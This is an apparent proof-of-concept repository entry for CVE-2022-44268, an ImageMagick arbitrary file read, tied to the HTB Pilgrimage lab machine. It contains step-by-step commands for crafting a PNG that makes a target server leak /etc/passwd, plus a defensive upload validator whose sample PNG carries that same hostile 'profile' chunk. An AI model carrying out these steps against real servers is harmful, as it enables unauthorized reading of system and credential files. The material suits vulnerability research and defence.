PoC details: 5c8161af6002426a718f9181fdac914b27202c4e

Source
Related vulnerability
Title: ImageMagick security vulnerability (CVE-2022-44268)
Description: ImageMagick is an open-source image processing suite from ImageMagick Studio (US). It can read, convert and write images in many formats. ImageMagick 7.1.0-49 contains a security vulnerability: an information disclosure flaw whereby, when it parses a PNG image, the image it produces may embed the contents of an arbitrary file.
Description
ImageMagick Arbitrary Read Files - CVE-2022-44268
Introduction
# ImageMagick-lfi-poc
### ImageMagick Arbitrary Read Files - CVE-2022-44268

Also used in the HTB Pilgrimage machine.

## ImageMagick LFI PoC [CVE-2022-44268]


The researchers at [MetabaseQ](https://www.metabaseq.com/imagemagick-zero-days/) discovered CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to information disclosure. When it parses a PNG image (e.g. for a resize), the resulting image can embed the content of an arbitrary remote file, provided the ImageMagick process has permission to read it.
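As an added defensive example (not the PoC's own code, and not taken from the MetabaseQ write-up): the script below walks the PNG chunk structure and flags `tEXt`/`zTXt`/`iTXt` chunks whose keyword is `profile`, the keyword that makes ImageMagick 7.1.0-49 read the named file, so an upload handler can reject such images before they are passed to ImageMagick. The two sample PNGs it checks are constructed inline.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# CVE-2022-44268 is triggered by a PNG text chunk whose keyword is "profile":
# ImageMagick 7.1.0-49 treats the chunk value as a filename and embeds that file.
TEXT_CHUNK_TYPES = {b"tEXt", b"zTXt", b"iTXt"}

def png_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def iter_chunks(data: bytes):
    """Yield (type, payload) for every chunk, checking signature, lengths and CRCs."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length
        if end + 4 > len(data):
            raise ValueError("truncated chunk")
        payload = data[pos + 8:end]
        crc = struct.unpack(">I", data[end:end + 4])[0]
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC on %r chunk" % ctype)
        yield ctype, payload
        pos = end + 4
        if ctype == b"IEND":
            break

def find_profile_chunks(data: bytes) -> list:
    """Return (chunk type, raw value) for every text chunk keyed 'profile'."""
    # Compared case-insensitively, as ImageMagick does; zTXt/iTXt values stay undecoded.
    hits = []
    for ctype, payload in iter_chunks(data):
        if ctype in TEXT_CHUNK_TYPES and b"\x00" in payload:
            keyword, value = payload.split(b"\x00", 1)
            if keyword.lower() == b"profile":
                hits.append((ctype.decode("ascii"), value))
    return hits

# Constructed samples: a 1x1 greyscale PNG, with and without the suspicious chunk.
IHDR = png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
IDAT = png_chunk(b"IDAT", zlib.compress(b"\x00\x00"))  # filter byte + one pixel
IEND = png_chunk(b"IEND", b"")
CLEAN_PNG = PNG_SIGNATURE + IHDR + IDAT + IEND
SUSPICIOUS_PNG = PNG_SIGNATURE + IHDR + png_chunk(b"tEXt", b"profile\x00/etc/passwd") + IDAT + IEND
```

Call `find_profile_chunks()` on the uploaded file's bytes and reject the upload when it returns a non-empty list; a `ValueError` (bad signature, truncated chunk or CRC mismatch) is also grounds for rejection.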



Step 1:

Run:

```
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat
```

Step 2:

Run:

```
python3 magick_exploit.py generate -l [local_file] -o [output_file]
```

In this example the local file is `/etc/passwd`, the file to be retrieved from the victim machine.

Step 3:

Upload the image file to the website.

Step 4:

Download the converted image file from the website and save it as `downloaded_image.png`.

Step 5:

Run:

```
python3 decode_profile.py
```

![](20230723122440.png)

## Note

If you get an error like:

```
 "/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
    profile = output_str.split("Raw profile type: \n\n    ")[1].split('Date:create:')[0]
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
```

it means the file you specified does not exist on the target (or ImageMagick could not read it), so no profile was embedded in the converted image. Use `/etc/passwd` as a sanity check.

## Credits

1. https://github.com/adhikara13/CVE-2022-44268-MagiLeak
2. https://github.com/Sybil-Scan/imagemagick-lfi-poc


File snapshot

```
[4.0K] /data/pocs/5c8161af6002426a718f9181fdac914b27202c4e
├── [276K] 20230723122440.png
├── [   0] decode_profile.py
├── [4.1K] magick_exploit.py
└── [1.5K] README.md

0 directories, 4 files
```